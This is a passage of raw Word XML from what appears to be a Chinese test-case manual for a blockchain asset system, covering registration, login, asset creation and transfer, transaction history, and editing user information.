                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F54FF3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“申请权限”，申请注册。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD0EC3B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6AB90211" wp14:editId="56914015">
                  <wp:extent cx="4104005" cy="1967230"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13970"/>
                  <wp:docPr id="108" name="图片 108" descr="Cli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lient1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1967230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1D5453C7" wp14:editId="471EAD38">
                  <wp:extent cx="4104005" cy="1953895"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1905"/>
                  <wp:docPr id="109" name="图片 109" descr="Cli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lient2"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1953895"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C034CE8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册成功之后，登录已注册账号。进入主页。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C6C3F71" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A995612"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2787B660" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册成功之后，登录已注册账号</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入主页。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="337CEF72" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FCA9F39"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1B4B515C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AFAA4A8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc36487936"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增、转移资产</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>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15A90EC8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8B9C5E"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72FAAC18" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="314" w:name="_Toc17600"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增、转移资产</w:t>
            </w:r>
            <w:bookmarkEnd w:id="314"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="092BBD7A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A8BE17"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11912B03" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增资产，并进行资产转移</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="74B2899B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E10AB50"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10890C88"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425E9C3D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0055F51A"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7CA8883C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主页主要展示交易列表，资产转移情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="687F62ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7EE81275" wp14:editId="28191FE5">
                  <wp:extent cx="4175760" cy="1878965"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="635"/>
                  <wp:docPr id="110" name="图片 110" descr="Cli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lient3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4175760" cy="1878965"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A03135B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“新建资产”为当前用户创建资产。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="630A9486" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="66E964BD" wp14:editId="22CA8A9E">
                  <wp:extent cx="4183380" cy="1890395"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="14605"/>
                  <wp:docPr id="111" name="图片 111" descr="clie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lient4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId42"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4183380" cy="1890395"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F0CC4C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>创建好的资产会显示在交易列表中。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDA3D80" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击对应资产后的“转移资产”，将资产由现拥有者转移到所指定的另一位用户。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7632B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4F348EB6" wp14:editId="2E53C89D">
                  <wp:extent cx="4211955" cy="1917065"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="13335"/>
                  <wp:docPr id="112" name="图片 112" descr="clie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lient5"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4211955" cy="1917065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="778365F2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看资产交易历史记录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EAF738" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击对应资产，弹出框显示资产交易历史记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1ACE05" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="5F440979" wp14:editId="502C4A03">
                  <wp:extent cx="4179570" cy="1905000"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="0"/>
                  <wp:docPr id="113" name="图片 113" descr="clie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lient6"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4179570" cy="1905000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="57A3E64F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="429CA4E7"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0E6F1C78"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color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>新增资产成功，转移资产成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6613915D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C73FD0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07E7E39C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17BC97BF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="315" w:name="_Toc36487937"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户信息管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="315"/>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012B065A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="391630A3"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2354A42D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="316" w:name="_Toc21226"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用户信息管理</w:t>
            </w:r>
            <w:bookmarkEnd w:id="316"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="40906D9B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9F606B"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7F42CBC6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对用户信息进行管理，修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3E8E3A1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FC9A4C1"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75C26AF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="77717E56" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7157F672"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56966F0B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击左侧菜单栏“账户”修改个人信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="642EEE1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4E2033E0" wp14:editId="4472E999">
                  <wp:extent cx="4211955" cy="1865630"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
                  <wp:docPr id="114" name="图片 114" descr="clie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lient7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4211955" cy="1865630"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="03D7A399" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5808A519"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5EB293A9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对用户信息进行管理，修改用户信息成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="76C23A57" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02ABD8F6"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15AF0792" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
